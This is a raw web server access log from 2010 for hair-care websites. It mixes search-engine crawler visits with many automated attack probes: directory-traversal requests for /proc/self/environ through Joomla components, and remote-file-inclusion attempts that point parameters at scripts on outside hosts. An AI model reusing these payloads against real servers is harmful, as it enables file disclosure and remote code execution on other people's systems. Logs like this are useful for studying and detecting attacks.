72.233.57.242 - - [02/May/2010:20:36:45 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:20:36:45 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:20:36:48 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:20:36:50 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
207.45.178.42 - - [02/May/2010:20:39:06 -0700] "GET //index.php?option=com_poll&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
77.88.25.28 - - [02/May/2010:20:43:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15033 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
72.233.57.242 - - [02/May/2010:20:46:06 -0700] "GET /logs/access.log//index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:20:46:06 -0700] "GET /logs/access.log//index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:20:46:06 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:20:46:06 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:20:46:06 -0700] "GET /logs//index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:20:46:06 -0700] "GET /logs//index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:20:46:24 -0700] "GET /logs/access.log//index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:20:46:24 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:20:46:24 -0700] "GET /logs//index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:20:46:29 -0700] "GET /logs/access.log//index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:20:46:30 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:20:46:30 -0700] "GET /logs//index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:20:54:59 -0700] "GET /logs/access.log//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:20:55:01 -0700] "GET /index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:20:55:02 -0700] "GET /logs//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
119.235.237.16 - - [02/May/2010:20:58:33 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16913 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
220.80.108.70 - - [02/May/2010:20:59:37 -0700] "GET /index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
217.65.223.34 - - [02/May/2010:21:03:12 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
217.65.223.34 - - [02/May/2010:21:03:17 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
77.88.25.28 - - [02/May/2010:21:05:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5409 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
207.45.178.42 - - [02/May/2010:21:09:56 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
207.45.178.42 - - [02/May/2010:21:09:59 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.221.130.13 - - [02/May/2010:21:12:21 -0700] "GET /logs/access.log//?mosConfig.absolute.path=http://www.babyschwimmen-leipzig.de/cok1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.13 - - [02/May/2010:21:12:21 -0700] "GET /?mosConfig.absolute.path=http://www.babyschwimmen-leipzig.de/cok1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.13 - - [02/May/2010:21:12:22 -0700] "GET /logs//?mosConfig.absolute.path=http://www.babyschwimmen-leipzig.de/cok1.txt? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.104.108 - - [02/May/2010:21:15:51 -0700] "GET /logs/access.log///delete.php/?board_skin_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.121.104.108 - - [02/May/2010:21:15:51 -0700] "GET /logs///delete.php/?board_skin_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.121.104.108 - - [02/May/2010:21:15:51 -0700] "GET //delete.php/?board_skin_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [02/May/2010:21:16:45 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13173 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
207.45.178.42 - - [02/May/2010:21:17:46 -0700] "GET /logs/access.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
207.45.178.42 - - [02/May/2010:21:17:46 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
207.45.178.42 - - [02/May/2010:21:17:47 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
220.80.108.70 - - [02/May/2010:21:18:12 -0700] "GET /index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
119.235.237.92 - - [02/May/2010:21:18:37 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17234 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "freehairsecrets.com"
121.190.102.21 - - [02/May/2010:21:19:45 -0700] "GET /skin/zero_vote/error.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [02/May/2010:21:19:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [02/May/2010:21:19:45 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.104.108 - - [02/May/2010:21:21:37 -0700] "GET /logs/access_100215.log///?_zb_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.104.108 - - [02/May/2010:21:21:37 -0700] "GET /logs///?_zb_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 200 5091 "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.104.108 - - [02/May/2010:21:21:37 -0700] "GET //?_zb_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.104.108 - - [02/May/2010:21:23:59 -0700] "GET /logs/access_100215.log///?_zb_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.104.108 - - [02/May/2010:21:23:59 -0700] "GET //?_zb_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.104.108 - - [02/May/2010:21:23:59 -0700] "GET /logs///?_zb_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 200 5091 "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.237.18 - - [02/May/2010:21:24:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16404 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
121.190.102.21 - - [02/May/2010:21:26:49 -0700] "GET /skin/zero_vote/error.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [02/May/2010:21:26:49 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [02/May/2010:21:26:49 -0700] "GET /logs/access_100111.log%20%20//skin/zero_vote/error.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:21:30:41 -0700] "GET /logs/access.log//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:21:30:43 -0700] "GET /index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [02/May/2010:21:30:44 -0700] "GET /logs//index.php?option=com_pccookbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
91.121.104.108 - - [02/May/2010:21:31:22 -0700] "GET //delete.php/?board_skin_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.104.108 - - [02/May/2010:21:31:22 -0700] "GET /logs///delete.php/?board_skin_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.104.108 - - [02/May/2010:21:31:22 -0700] "GET /logs/access_100215.log///delete.php/?board_skin_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.104.108 - - [02/May/2010:21:33:31 -0700] "GET //delete.php/?board_skin_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.121.104.108 - - [02/May/2010:21:33:31 -0700] "GET /logs/access.log///delete.php/?board_skin_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.121.104.108 - - [02/May/2010:21:33:31 -0700] "GET /logs///delete.php/?board_skin_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.80.108.70 - - [02/May/2010:21:34:06 -0700] "GET /logs/access.log//index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [02/May/2010:21:34:07 -0700] "GET /index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [02/May/2010:21:34:07 -0700] "GET /logs//index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
91.121.104.108 - - [02/May/2010:21:35:56 -0700] "GET /logs/access.log///delete.php/?board_skin_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.121.104.108 - - [02/May/2010:21:35:56 -0700] "GET /logs///delete.php/?board_skin_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.121.104.108 - - [02/May/2010:21:35:56 -0700] "GET //delete.php/?board_skin_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
119.235.237.18 - - [02/May/2010:21:38:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18806 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
91.121.104.108 - - [02/May/2010:21:38:16 -0700] "GET /logs/access_100215.log///delete.php/?board_skin_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.104.108 - - [02/May/2010:21:38:16 -0700] "GET //delete.php/?board_skin_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.104.108 - - [02/May/2010:21:38:16 -0700] "GET /logs///delete.php/?board_skin_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.235.237.20 - - [02/May/2010:21:42:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12296 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
77.88.25.28 - - [02/May/2010:21:43:43 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12989 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
91.205.96.13 - - [02/May/2010:21:43:49 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:50 -0700] "GET /?N=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:50 -0700] "GET /?M=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:50 -0700] "GET /?S=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:51 -0700] "GET /?D=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:51 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:52 -0700] "GET /logs/ HTTP/1.1" 200 5085 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:52 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:52 -0700] "GET /?N=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:53 -0700] "GET /?M=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:53 -0700] "GET /?S=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:53 -0700] "GET /?D=D HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:54 -0700] "GET /logs/?N=D HTTP/1.1" 200 5085 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:54 -0700] "GET /logs/?M=A HTTP/1.1" 200 5085 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:54 -0700] "GET /logs/?S=A HTTP/1.1" 200 5085 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:55 -0700] "GET /logs/?D=A HTTP/1.1" 200 5085 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:55 -0700] "GET /tmp/?D=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:55 -0700] "GET /tmp/?N=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:56 -0700] "GET /logs/?S=D HTTP/1.1" 200 5085 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:56 -0700] "GET /logs/?D=D HTTP/1.1" 200 5085 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:57 -0700] "GET /tmp/?N=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:57 -0700] "GET /tmp/?M=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:57 -0700] "GET /tmp/?S=A HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:57 -0700] "GET /tmp/?S=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:58 -0700] "GET /logs/?N=A HTTP/1.1" 200 5085 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:58 -0700] "GET /logs/?M=D HTTP/1.1" 200 5085 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:58 -0700] "GET /tmp/?D=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
91.205.96.13 - - [02/May/2010:21:43:59 -0700] "GET /tmp/?M=D HTTP/1.1" 200 659 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "growlonghairfast.com"
119.235.237.19 - - [02/May/2010:21:44:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13629 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
195.191.40.17 - - [02/May/2010:21:46:48 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "growlonghairfast.com"
195.191.40.17 - - [02/May/2010:21:46:49 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "growlonghairfast.com"
210.118.170.118 - - [02/May/2010:21:51:38 -0700] "GET /?phpbb_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
210.118.170.118 - - [02/May/2010:21:51:38 -0700] "GET /logs//?phpbb_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "growlonghairfast.com"
210.118.170.118 - - [02/May/2010:21:51:39 -0700] "GET /logs/access_091012.log%20%20//?phpbb_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.118.170.118 - - [02/May/2010:21:52:37 -0700] "GET /logs/access_100412.log%20%20//?phpbb_root_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.80.108.70 - - [02/May/2010:21:53:01 -0700] "GET /logs/access.log//index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [02/May/2010:21:53:02 -0700] "GET /index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [02/May/2010:21:53:03 -0700] "GET /logs//index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
66.249.65.78 - - [02/May/2010:21:54:41 -0700] "GET /sitemap.xml HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
195.191.40.17 - - [02/May/2010:22:02:13 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "freehairsecrets.com"
195.191.40.17 - - [02/May/2010:22:02:13 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "freehairsecrets.com"
119.235.237.20 - - [02/May/2010:22:05:45 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18916 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
202.72.242.242 - - [02/May/2010:22:05:49 -0700] "GET /?board_skin_path=' HTTP/1.1" 200 926 "-" "libwww-perl/5.79" "growlonghairfast.com"
77.88.25.28 - - [02/May/2010:22:06:56 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13155 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
202.72.242.242 - - [02/May/2010:22:09:07 -0700] "GET /?board_skin_path=' HTTP/1.1" 200 926 "-" "libwww-perl/5.79" "www.freehairsecrets.com"
77.88.25.28 - - [02/May/2010:22:11:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13373 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
119.235.237.19 - - [02/May/2010:22:19:45 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13835 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
119.235.237.17 - - [02/May/2010:22:20:47 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
119.235.237.17 - - [02/May/2010:22:21:46 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12211 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:22:22:55 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:22:22:55 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [02/May/2010:22:22:55 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.112.151 - - [02/May/2010:22:30:32 -0700] "GET /freehairsecretsphp/ HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
77.88.25.28 - - [02/May/2010:22:30:52 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13410 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
72.233.57.242 - - [02/May/2010:22:35:02 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
72.233.57.242 - - [02/May/2010:22:35:16 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:22:35:17 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [02/May/2010:22:35:18 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
